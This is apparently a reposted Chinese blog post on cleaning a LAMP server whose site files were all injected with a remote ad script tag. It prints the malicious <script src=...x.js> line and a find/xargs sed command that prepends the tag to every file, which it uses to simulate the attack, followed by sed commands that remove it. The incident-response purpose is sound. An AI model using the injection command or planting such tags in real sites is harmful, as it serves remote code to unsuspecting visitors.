2. 程式人生 > >lamp服務器站點目錄被植入廣告代碼

lamp服務器站點目錄被植入廣告代碼

阿新 發佈:2018-05-27
植入代碼廣告刪除替換

title: lamp服務器站點目錄被植入廣告代碼
tags: 植入代碼廣告,刪除,替換
grammar_cjkRuby: true

[TOC]

lamp服務器站點目錄被植入廣告代碼

1 產生背景

由於公司運維人員在系統上的權限體現分配不合理,導致站點目錄被上傳木馬,把站點目錄下所有文件均植入了如下廣告<script language=javascript src=http://%4%66E/x.js?google_ad=93></script>
包括圖片目錄也被植入,網站打開都會調用這個地址,顯示出一個廣告,產生惡劣的影響。

2 解決思路

因為站點目錄下所有文件都被植入了<script language=javascript src=http://%4%66E/x.js?google_ad=93></script>這條代碼,導致打開任何頁面都會調用這個地址,因此需要在每個文件把該代碼刪除。

3 從發現問題到解決的過程

3.1 運維人員,網站用戶發現問題,網站有彈窗廣告。
3.2 運營人員報給開發,開發工程師和運維工程師共同解決。
3.3 開發工程師發現問題,所有站點目錄被植入了一段JS代碼。
3.4 運維工程師解決問題:
3.4.1 備份原始出問題的所有文件
3.4.2 使用find +sed替換內容
3.4.3 確認網站運行正常,且無上述彈窗廣告
3.4.5 詳細查看日誌,尋找問題來源
3.4.6 提供改進方案,杜絕這種事情再次發生

4 處理過程

4.1 通過和該公司運維人員確認確實出現了問題,詳細查看確認問題情況,發現是站點目錄下所有文件的開頭都被植入了惡意代碼。
4.2 制定處理方案,先備份已有數據,執行命令批量修改回來。

4.3 寫解決說明,發送給運維工程師。
4.4 詢問處理結果,詳細查看日誌,尋求問題來源
4.5 提供站點嚴格權限規劃方案,及新上線發布規範的思路

5 處理步驟

5.1 因此先模擬出問題來源,如下

[root@server ~]# mkdir /www
[root@server ~]# cd /www
[root@server www]# touch file{1..100}
[root@server www]# for n in `ls`;do echo "hello world" >>$n;done      
[root@server www]# for n in `ls`;do cat $n;done |wc -l
100
[root@server www]# find ./ -type f |xargs sed -i ‘1 i <script language=javascript src=http://%4%66E/x.js?google_ad=93></script>‘
[root@server www]# find ./ -type f |xargs cat
<script language=javascript src=http://%4%66E/x.js?google_ad=93></script>
hello world
<script language=javascript src=http://%4%66E/x.js?google_ad=93></script>
hello world
<script language=javascript src=http://%4%66E/x.js?google_ad=93></script>
[root@server www]# cp -a /www /mnt/

5.2 利用sed命令將代碼片段匹配刪除或者替換,如:

刪除
[root@server www]# find ./ -type f |xargs sed -i ‘/^.* src=.*pt>$/d‘   
[root@server www]# find ./ -type f |xargs cat
hello world
hello world
hello world
hello world
hello world

替換
[root@server www]# find ./ -type f |xargs sed -i ‘1 i <script language=javascript src=http://%4%66E/x.js?google_ad=93></script>‘
[root@server www]# 
[root@server www]# 
[root@server www]# find ./ -type f |xargs sed -i ‘s#^.* src=.*pt>$##g‘
[root@server www]# find ./ -type f |xargs cat

hello world

hello world

hello world
因為把惡意代碼替換為空了,所以每個文件開頭都出現了空白行,如果介意的話可以批量刪除,如下:
[root@server www]# find ./ -type f |xargs sed -i ‘/^$/d‘
[root@server www]# find ./ -type f |xargs cat
hello world
hello world
hello world

lamp服務器站點目錄被植入廣告代碼

相關推薦

lamp服務站點目錄植入廣告

植入代碼廣告刪除替換title: lamp服務器站點目錄被植入廣告代碼tags: 植入代碼廣告,刪除,替換grammar_cjkRuby: true [TOC] lamp服務器站點目錄被植入廣告代碼 1 產生背景 由於公司運維人員在系統上的權限體現分配不合理,導致站點目錄被上傳木馬,把站點目錄下所有文件均植入

總結之提交並部署到服務上,為什麽卻沒有更新?

jenkins gitlab docker harbor 容器 問題描述: 遇到過幾次這種情況:開發將代碼提交之後,通過打包部署,發現部署到服務器上的代碼不是最新的,還是修改之前的老代碼。 打包部署流程背景說明: gitlab——》jenkins服務器打jar包——》將打好的jar包過濾並

Ubuntu 17.04 搭建LAMP服務環境流程

ins () 更改 lib tro code 文件 etc doc 安裝Apache2 安裝代碼 sudo apt-get install apache2 更改默認目錄 sudo vim /etc/apache2/apache2.conf // 將 <

samba 服務共享目錄不能訪問,smbuser家目錄可以訪問。

name roo serve bad 分享 color 51cto text 正常 問題: samba 共享目錄不能訪問,用戶家目錄可以訪問。 [root@toolsystem smbdir]# smbclient -U smbuser //192.168.0.28/co

Nginx服務除了/目錄,全飄404

nginx.conf配置項不管是Nginx還是Apache,如果不配置,都會出現404,不能路由.我雲服務器安裝的是WDCP,默認的Nginx配置文件 nginx/conf/vhost/00000.default.conf 用vim編輯 在server {}裏加上location / { try_fi

服務 ‘xxxx‘ 已定義為分發服務。若要將該服務器重新配置為分發服務,必須首先卸載現有的分發服務

statement exceptio service title 技術分享 courier minor stat pre 使用AWS DMS(Database Migration Service)將SQL Server數據庫同步到AWS的Data Lake上,需要在

socket實現兩臺FTP服務指定目錄下的文件轉移(不依賴第三方jar包)

gets util new ram ali ftp文件 turn tps lap 通過socket實現兩臺FTP服務器指定目錄下的文件轉移,其中包含了基礎了ftp文件列表顯示、上傳和下載。這裏僅供學習用,需掌握的點有socket、ftp命令、文件流讀取轉換等 完整代碼如下:

在另一臺服務上還原誤刪的 MySQL 數據

values value select mysql quic table flush 最近的備份 put 數據庫備份語句 mysqldump -S /tmp/mysql3309.sock -u root -pMySQL8.0 --single-transaction --q

如何防止網頁植入廣告,內容監控-HTTPS

前幾天一朋友說訪問網站頁面底部怎麼出現小廣告了呢,內容有點不雅,朋友截圖發給我,調侃我說怎麼放這種廣告,我一聽納悶,網站執行伊始,從來沒有投放過任何廣告,更別說不雅廣告了。 最近還遇到一個問題就是,網站莫名其妙被服務商攔截,服務商有一個比較低能的違法資訊監測系統,為啥低能呢?

搭建Git服務,Git配置別名,使用

sts 團隊協作 繼承 mod ubunt 支持 開源 fine 暫存區 搭建Git服務器 在遠程倉庫一節中,我們講了遠程倉庫實際上和本地倉庫沒啥不同,純粹為了7x24小時開機並交換大家的修改。 GitHub就是一個免費托管開源代碼的遠程倉庫。但是對於

在linux服務centos上使用svn同步代到項目中

image art kill -9 cal 項目 功能 git 失敗 你會 一.需求   1.在多人開發過程中代碼的管理以及版本的控制是一個很重要的問題,因為在開發過程中我們可能會同時更改過某個文件或者更改過多個文件,   這會導致我們很容易發生錯誤。所以我們需要一個方式去

powershell遠程管理服務磁盤空間的實現代

master rdquo const 組策略 logical subject 註冊表 ssi wds 一、啟用遠程管理 1、將管理服務器的trusthost列表改為* 運行Set-item wsman:localhostclienttrustedhosts ?value

程序員隨筆:使用來自服務的圖像(有源

程序員 ios開發 移動開發 iOS開發人員 如果您是移動應用程序開發人員,則在某個時間點您需要與後端進行互動。您可能需要做的其中一項任務是從服務器檢索並顯示圖像,或將圖像提交給該服務器。提交圖像時應該使用什麽格式?如何將從服務調用接收的字節轉換為圖像?讓我們將整個堆棧從服務器構建到iOS應用

服務向用戶返回的狀態和提示信息,常見的有以下一些(方括號中是該狀態對應的HTTP動詞)

authorize valid 記錄 creat unp pat 授權 eat 無法 200 OK - [GET]:服務器成功返回用戶請求的數據,該操作是冪等的(Idempotent)。 201 CREATED - [POST/PUT/PATCH]:用戶新建或修改數據成功

如何利用$_SERVER["PHP_SELF"]變量植入script

ted 數據 java rip .cn pac 要求 服務 eal 假如我們是黑客,可以誘騙用戶訪問如下鏈接, 相當於用戶會在瀏覽器地址欄中輸入以下地址: http://www.xxx.com/test_form.php/%22%3E%3Cscript%3Ealert(‘h

java移動文件夾、 慎用java file.renameTo(f)方法 、 java從一個目錄復制文件到另一個目錄下 、 java完成刪除文件、文件夾 、

不存在 art 我的電腦 lan nbsp 文件 刪除文件 csdn 結果 java移動文件夾(包含子文件和子文件夾): http://blog.csdn.net/yongh701/article/details/45070353 慎用java file.rename

(六)整合spring cloud雲服務架構 - HongHu雲架構common-service結構分析

如何 通過 -m 交互 art 實現 使用 sof 組織 當前的分布式微服務雲架構平臺使用Maven構建,所以common-service的通用服務按照maven構建獨立的系統服務,結構如下: particle-commonservice: spring cloud 系統

Spring Cloud雲服務架構 - 企業雲架構common-service結構分析

spring boot 當前的分布式微服務雲架構平臺使用Maven構建,所以common-service的通用服務按照maven構建獨立的系統服務,結構如下:particle-commonservice: spring cloud 系統服務根項目,所有服務項目的根依賴。particle-commons

Vsftpd服務配置、ftp命令、錯誤、日誌格式

Vsftpd服務配置 ftp命令 錯誤代碼 日誌格式 1、Vsftpd的配置文件:/etc/vsftpd/vsftpd.conf :主配置文件 /usr/sbin/vsftpd :Vsftpd的主程序/etc/rc.d/init.d/vsftpd

整合spring cloud雲服務架構 - 企業雲架構common-service結構分析

springcloud springboot mybatis eureka config 當前的分布式微服務雲架構平臺使用Maven構建,所以common-service的通用服務按照maven構建獨立的系統服務,結構如下: particle-commonservice: spring